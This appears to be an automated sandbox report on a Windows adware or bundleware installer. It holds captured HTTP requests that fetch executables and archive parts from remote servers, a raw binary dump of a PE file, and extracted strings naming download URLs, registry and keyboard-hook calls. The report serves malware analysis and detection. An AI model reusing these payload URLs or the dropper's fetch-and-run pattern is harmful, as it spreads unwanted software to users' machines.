Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:17 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=6313
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1441175957.dop018.am4.t,1441175957.cds037.am4.c
PK.........A.F....5.G.5.G.....chrome.packed.7z7z..'...X=.A..G.............4Q.J......8%D.i..."...8Z.z ..M.l.S.3...%......a...CE....JS,...o9..?.K.,.H......55G.....4....&.57c.Cc.b..(..r..dg...}.I.:l...M...s...L.....I.[... .h...S....Q.T...P%.G3....J.....-?........~97........~.$.BE..%....!..^9X........>....P....k......M3....W.W..r ..4..Jf.d*L_.l..V5Z..m......w..u....r.\.O.D...3T...[".E....A.ME?j....o......&t.7.v........G".....)k.y.V0...^)..1C7...b..n...W1.k.3a....G...........C.[....W....@t..X.lOU...hL..lT.)...`.;1.8}.2|.P..Z....!hn..I..u....R...l.=.....).i.H....K.p...5y.a`..S].$./...i.Y...X........lC 6..b..T..D|....X <v........rny).4.>...c..zE..h...>....,.,...Q..X...dW,.& G>.../..b.c...e...sOn..t..gX.v.. ...4S4]x'.h..E..-.c.|.....C.w..g..h...`9`c.......:..7.......!...Q.9Q\..h...@.(...g.C.!...TC.5.>t...?(|I..@B'z H%^..J...JDB.T/.&K1.9..f. .\......[...8fg%l/.l"..|.(..h}.M.t.5.Q......`\.B..Dg..,skG...5.....i.r.7O..C....M...!......P.D.a.i...zH.}....../......" .i...Z.b..i..,..V..L.....G..(.j..T.:3{7...k\..`.=.&.QC.)...5&...k..........\...L..ps,.".;........lt......)...zB.....]W/.H(` 0....v...j.....~...p..........V.O.Tt{..GbMH.g...!......V....Q..s<......SA.Rna.>...I..|.....PT..E$...9^'UI..I.y6.v ... .D.T.)..3=(z.u.:L...B..<.q..'i...X.{..........B.."k...@.I...C.e)..}.....Q......Q...m.!...b1.qf.7.P<.....G....m...........a..Y..T>.............W....su..J..U..9!...M..G...(.Z....;Yy....H......j.....cR..........Z%........%..&Z.i.y...@">...;..b..DYJ.1...]JZ.A..,-.m..qI.......X9.....@..@....$.o...
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4605\",\"channel_id\": \"\", \"utm_addition\":\"vpol=iml&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:45 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 02 Sep 15 06:39:00 GMT
Set-Cookie: _c4aid=6823647C64484072ADCCEDCE0883B176; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=6823647C64484072ADCCEDCE0883B176,1441175985.6349; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..
GET /crossbrowse/ie/106/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:16 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=6311
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1441175957.dop018.am4.t,1441175956.cds036.am4.c
..4Ll.....a......|a../...y.R1.bR. ..Rv.u'.c..o.....{.......5NkM.0.....y./..4.....(.Uw.m3......}....@z.....7..2.c.wv..Q...o.y9.L..1.lBn.PFt_.5..(.........Ll..].n].E$.....,.../.....DF.<.[ B...Z...#Z..WWd...$..k....>*...o)&.5.>.......b..2........#.U.ui.........[.P.s.?...-.....C....A..fv...Z.:..H<........A...>Y..}..RJ.....dO...*].@4..U..?$..<.j.DF......4...j.?b~m...l..R"...,x.4.....[A..V.Nj.......t..@..G.......I.K..2U.............r.k..5Xn%..W.4...L.(.....f..h.Z.S.m;..9.....#.....o....r....Y.&..r..hU..e..P......6...`..-g.... ..tL..We`r...1.|..l....P$.GQ.!R.......C~.v........ ..H....a6.....B.....{.....=...\P?...}.i..]m....?F..3|T.QE..Sq.U.rz<u..t..... ..@..,...$D.\P..m.B..ePhy.f.V.......M..XI.k3.g.......gP....(..&~N..ik\..<.......!U..g..3.....^t...@.$..F....2.....t.?...........]....r......~...2,P........"..g.8...L.K....J6CP/.|..d=.`.....UsOP.Bl(nilW.......[<..,.......l........5....p,w8t.....L9;.U....K/6.P............J....o#L~.@.....x..G..N.Wf.N...><4o.ha...].v.......P....f.c......$l..j........I....y...Iw....S.vwW.3..c.......E...(..S$l...su{P:"XW..<.-.OU$6....YD.L4..p.9......W;....h.e..r<.p..I..=.......&......9..&..}.#.......sX;u.)...Es/a.....:.J.L.L...T"..E..O...[hzg.s..eT...9..(....7.SL......V.;....a80....Mdd-..'/....j......p'u.............z.-#:..q..<...h..`.........0..|.U.GG.0.f.c.....m.D....~T..m..(...zv..$..s..c......{..........)....z....:..H...)...B.j.L..J........U.j..Q..K:.....u-z..`.F3O...U..v.....p...........K`.........I..Anw..d..Hq.......vah..5A......|....t.Iy.BI....
<<< skipped >>>
GET /VuuPC_VO2_8907.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:59 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441114670"
Last-Modified: Tue, 01 Sep 2015 13:37:50 GMT
Cache-Control: max-age=25558
Content-Length: 230012
Content-Type: application/octet-stream
X-HW: 1441176000.dop017.am4.t,1441175999.cds043.am4.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^....... ...0.......p....@.......................... 8..............................................t........7..?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X............v..............@....ndata....2.. ...........................rsrc....?....7..@...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.E..H.P.u..u..u...Hr@..B...SV.5p.E..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>
Map
The SpyTool connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1504:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
360TotalSecurity.exe
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\inetc.dll
hXXp://VVV.codec13sudha.com/download.php?l4J9dw==
hXXp://VVV.codec13sudha.com/download.php?l4J9dw==
62.exe&errorlevel=0
62.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
6.xMn
6.xMn
*A&q.WouU1
*A&q.WouU1
w.rEZ
w.rEZ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn3E.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn3E.tmp
nsn3E.tmp
nsn3E.tmp
//livestatscounter.com/Generic/vos.php?ch=
//livestatscounter.com/Generic/vos.php?ch=
8ed6718599ebcc64cea4819f60c087.exe
8ed6718599ebcc64cea4819f60c087.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp
Uninstall.exe
Uninstall.exe
n.php?r=vu_vo2_
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==
url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==
com/setup_362.exe
com/setup_362.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
555555555555
555555555555
1.0.0.1
1.0.0.1
upgmsd_re_005010077.exe_1364:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
RSSSSSSh
RSSSSSSh
t.hX0f
t.hX0f
QSShh
QSShh
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSSh
SSSSh
u$SShe
u$SShe
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
SSSShx
SSSShx
j%XtL9E
j%XtL9E
FtPW
FtPW
SSh@B
SSh@B
u.SSh
u.SSh
tsSSh
tsSSh
FTCP
FTCP
t.WWWSP
t.WWWSP
tAHt.HHt
tAHt.HHt
FTPS
FTPS
u)SShF
u)SShF
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
!"#$%&'((()* ,-./01
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CFtpFileFind
CHttpConnection
CHttpConnection
CFtpConnection
CFtpConnection
CHttpFile
CHttpFile
RegDeleteKeyExW
RegDeleteKeyExW
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CHotKeyCtrl
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
qR.Rd
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
%%X
%%X
RegSetKeySecurity error! (rc=%lu)
RegSetKeySecurity error! (rc=%lu)
Key not found.
Key not found.
Error opening key.
Error opening key.
ntdll.dll
ntdll.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
twrejsg$45dsfdfs23534544jryubyjubmmtreycy52345&/%(&(/gaagdsagdshbdfhgsagds&(%&(%jgsfg4567;;;;%%%%564&&&ygfhfghhfgrthth45234523453452rtfghjfghjfghjffgfdgdfg.,df.g,dhgdfhgfhdf...fhg.h.dfg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh
twrejsg$45dsfdfs23534544jryubyjubmmtreycy52345&/%(&(/gaagdsagdshbdfhgsagds&(%&(%jgsfg4567;;;;%%%%564&&&ygfhfghhfgrthth45234523453452rtfghjfghjfghjffgfdgdfg.,df.g,dhgdfhgfhdf...fhg.h.dfg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh
eriutheriutgjhtadfjtyjtygfhfghhfhgerty.h.d742452d455agasagsfagsaggfvhgh sdfsasdf445afgdsdgasdgfasdgsdg6353651rf/(%/)%/(sdfdfg45345345fg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh
eriutheriutgjhtadfjtyjtygfhfghhfhgerty.h.d742452d455agasagsfagsaggfvhgh sdfsasdf445afgdsdgasdgfasdgsdg6353651rf/(%/)%/(sdfdfg45345345fg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh
ertyr56u56u56adfhafdsfghgu5dasfsfdfsadfsaddfdfs1gsdfhjfhgdfgsgsdfadadsfasdffsgbhgbgfaafsdgafsgafsgagsgaafsdasdfsfasadsgasdgsgdfa5634453.dfgsd.&&%//(/&)($&/&$/fg,d.fg,sfa4564564563456356fthrthrthrthrfthrt5656u6ethyrthjrthjrethjrthjerthjertjherthjrthjtrhjrthj
ertyr56u56u56adfhafdsfghgu5dasfsfdfsadfsaddfdfs1gsdfhjfhgdfgsgsdfadadsfasdffsgbhgbgfaafsdgafsgafsgagsgaafsdasdfsfasadsgasdgsgdfa5634453.dfgsd.&&%//(/&)($&/&$/fg,d.fg,sfa4564564563456356fthrthrthrthrfthrt5656u6ethyrthjrthjrethjrthjerthjertjherthjrthjtrhjrthj
rthrthr$%&.fg,hjfgkhsdfghhdsagdfgu56yu56u6uafdsasfsdfasfas5463456afhgjhh45645645gassavdfghcvhbvhdasdsasd656u56rthrthrthrthtrhrthtrhrthtrhtrhtrhrth
rthrthr$%&.fg,hjfgkhsdfghhdsagdfgu56yu56u6uafdsasfsdfasfas5463456afhgjhh45645645gassavdfghcvhbvhdasdsasd656u56rthrthrthrthtrhrthtrhrthtrhtrhtrhrth
Error %d: Could not begin update of %s
Error %d: Could not begin update of %s
Error %d: Updating resource
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
UnhookWindowsHookEx
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegLoadKeyW
RegLoadKeyW
RegUnLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyW
RegEnumKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
UrlUnescapeW
UrlUnescapeW
SHLWAPI.dll
SHLWAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEACC.dll
OLEACC.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpDeleteFileW
FtpRenameFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpPutFileW
FtpGetFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpEndRequestW
HttpEndRequestW
HttpSendRequestExW
HttpSendRequestExW
FtpOpenFileW
FtpOpenFileW
FtpCommandW
FtpCommandW
FtpFindFirstFileW
FtpFindFirstFileW
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AVCFtpFileFind@@
.?AVCFtpFileFind@@
.?AVCFtpConnection@@
.?AVCFtpConnection@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCToolCmdUI@@
.?AVCToolCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCKeyboardManager@@
.?AVCKeyboardManager@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AVCMFCWindowsManagerDialog@@
.?AVCMFCWindowsManagerDialog@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
